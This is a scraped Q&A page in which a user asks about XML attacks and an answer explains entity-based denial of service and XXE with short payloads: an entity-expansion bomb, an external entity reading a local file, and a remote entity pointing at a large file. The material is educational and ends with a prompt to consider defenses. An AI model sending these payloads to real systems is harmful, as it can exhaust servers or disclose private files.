Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

xml vulnerabilities

Tags:

security

xml

xml has been the backbone of the service oriented application(SOA) and it will be a useful one in the coming future. As xml is easy , flexible, it can be easily made vulnerable and the attackers can use it for their own purpose. As such some of the attacks by are coercive parsing attack, xml external entity(XEE) attack, xml dos(xdos) attack, xml bombs.
can any one tell in detail about these attacks.
how could one can simulate these attacks practically in a single system?

like image 283
Rohit Avatar asked Dec 15 '09 11:12

Rohit


People also ask

How is XML vulnerable?

However, XML documents have many security vulnerabilities that can be targeted for different types of attacks, such as file retrieval, server side request forgery, port scanning, or brute force attacks."

Is XML secure?

XML encryption can be used to assure data confidentiality of transmitted messages. You can encrypt an entire message or choose to encrypt only certain elements of the message. However, using XML encryption (either separately from XML digital signatures or in conjunction) can have potential security implications.

What is XML exploitation?

XXE injection is a type of web security vulnerability that allows an attacker to interfere with the way an application processes XML data.

What is XML Injection attack?

XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intend logic of the application.


1 Answers

First we need to distinguish the effect of attack from the feature that is exploited.

Particular features of XML that can be exploited are

  • XML entities
  • Proprietary extension of parser and validator
  • Cyclic/recursive references
  • Remote access

The effects can be either

  • DOS
  • Information disclosure

I don't think there is percise definition of a "bomb", but it refers to an attack that is particularly "compact" and which "expands". A "coercive parsing attack" exploits the nature of the XML model to overwhelm the parser.

The examples below are taken from XML Denial of Service Attacks and Defenses. Also, if you understand french, read the excellent magazine "La security des web services".

Example 1

A bomb using entities which result in a DOS because it exhausts the memory

<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

If you have 50'000 "aaaa...aaa" and 50'0000 &a:&a;...&a;, a payload of 200KB expands to more than 2GB in memory

Example 2

An entity could be used to access another file in a unauthorized way. This leads to information disclosure.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file SYSTEM "/sensitive.txt" >
]>
<tag> &file; </tag>

Example 3

Using the ability of certain parser to access remote resources (see http://www.ibm.com/developerworks/xml/library/x-tipgentity.html), now go figure what happens if the file bigfile.xml is 2GB. This probably leads to a DOS.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file  SYSTEM "http://www.mysite.com/bigfile.xml" >
]>
<tag> &file; </tag>

Example 4

This recursion will lead to memory exhaust and probably a DOS.

<!ENTITY companyname "Contoso Inc.">
<!ENTITY divisionname "&companyname; Web Products Division">

If this is schoolwork, then you should also think about how you can protect yourself from such attack.

like image 118
ewernli Avatar answered Nov 03 '22 21:11

ewernli